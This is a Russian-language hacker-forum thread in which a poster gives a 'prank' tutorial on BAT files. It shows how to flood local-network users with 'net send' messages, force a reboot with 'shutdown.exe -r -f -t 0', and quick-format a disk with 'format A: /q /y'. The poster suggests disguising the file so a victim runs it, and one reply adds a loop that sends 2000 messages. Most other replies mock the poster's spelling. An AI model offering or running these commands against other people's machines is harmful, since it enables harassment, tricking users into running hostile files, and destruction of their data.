Здраствуйте дорогие Хацкеры и Ламерки!!! Сегодня мы с вами розглянем 1 маленькую шалость в В локальной сити и будем роботать с Файлами БАТ!! НАдеюсь вам понравитсо))Я не буду поеснять что это такое(вы найдёте всё это в сылках в низу)!Перейдём сразу к делу- Берём открываем тотал командер,заходим на наш диск на котором стоит винда(у меня это С) и смотрим в корне папки файлик AUTOEXEC.Bat(если не видете то в настройках помтавте в тотале чтоб он видел скрытые и ситемные файлы) и копи его на робочий стол например,после того берём его переименовуем например в Флуд компа жертвы,открываем этот файлик блокнотиком и заносим такие строки net send * "Сюда пишем что будет у нас в сообщении флуда." - Вот воаля флуд готов!Берём делаем копи например: net send * "Сюда пишем что будет у нас в сообщении флуда." net send * "Сюда пишем что будет у нас в сообщении флуда." net send * "Сюда пишем что будет у нас в сообщении флуда." net send * "Сюда пишем что будет у нас в сообщении флуда." к примеру 100000000000 рас и сохраняем эту страничку в блокноте!После этого провиряем его НАЖИМАЕМ И У НАС ВЫЛЕТАЕТ МНОГО СТРОК С ПРЕДЛОЖЕНИЕМ <Сюда пишем что будет у нас в сообщении флуда>!Всё флуд готов мы може его скинуть нашей жертве типо открой норм тема или просто в строку *-дописать чейто IP!(К примеру net send 201.0.0.1 "LUZER."И всё! Также хорошо будет если вы будите скидовать жертве сам флуд с * в конце строки допишите shutdown.exe -r -f -t 0 -c "LUZER." - Это вырубит комп вашей жертвы после флуда!!! Также можем создать флуд а потом формат диска))Для этого после строк флуда водим такой лог format A: /q /y- Здесь мы форматируем дискету!!/y-выходит как ответ на формат!!! И канешно наж любимый античат не пропустил этой темы и если вам стало интересно про пакости Бат файлов пройдите по этой сылке -- http://old.antichat.ru/txt/old/dhgroup/bat.shtml И болие мелкое изучение Бат файлов на http://systemnews.com.ru/?mod=art&part=dos&id=001 P.S Прошу не кидать меня сразу в грязь а тему в топку за какийто формальности или ошибки,а лутше их исправить и продолжить столь интересную тему Шалостей в сети или Бат файлы!ТАкже прошу извенить за Орфографические ошибки ибо плохо знаб Русский язык)))
О началось))0Ребятушки яж говорил это не для вашего уровня знаний предназначяетсо!!!!!А для ребят в роди меня самый нормасик зделать какуйто пакость в ланке))
писец) плакаю) Кстати в ХП СП 2 Слуджба "Мессенджер", которая принимает твои нет сенды по дефолту остановлена За копирование автоэкзека аж + хоцца поставить)) спасибо, поднял настроение чувак, ты тру!
SanyXou, откуда бы ты нибыл, в Украине учат русский язык. В Киеве пол города разговаривают на русском. В украинском -ЧА (-ЩА) так же пишутся с буквой А. Даже боюсь перечислять ещё. Если действительно не можешь на русском - напиши на украинском, я переведу для всех. С таким правописанием с тебя даже на удаффкоме орать будут. Блин, у тебя какие оценки? Тебе экзамен по русскому языку сдавать, в конце-то концов!
А не легче былобы так? Code: for /L %%I IN (1,1,%12000) DO ( net send victim %%I) Отправит 2000 сообшений А вообще твой сосед после такова каличества сообщения хорошенько поглумится над тобой в реале... Например заставит отжаться ровно стока скока ты прислал месаг =/
так а чо вы серьезно все это восприняли? %) Хотя да. Программеры всегда все воспринимают прямо) Я например сарказма не понимаю)
Midas-Чювак ты хоть настрой поднял))))БУду те темы в личь катать а ты мне их переводить буш))))Не лутше тода в ворде буду писать темы а сюда копи) smOleg--ЧТо у тя там не сроботало???Накатай в личь писмецо всё зделаем,всё роботать буд))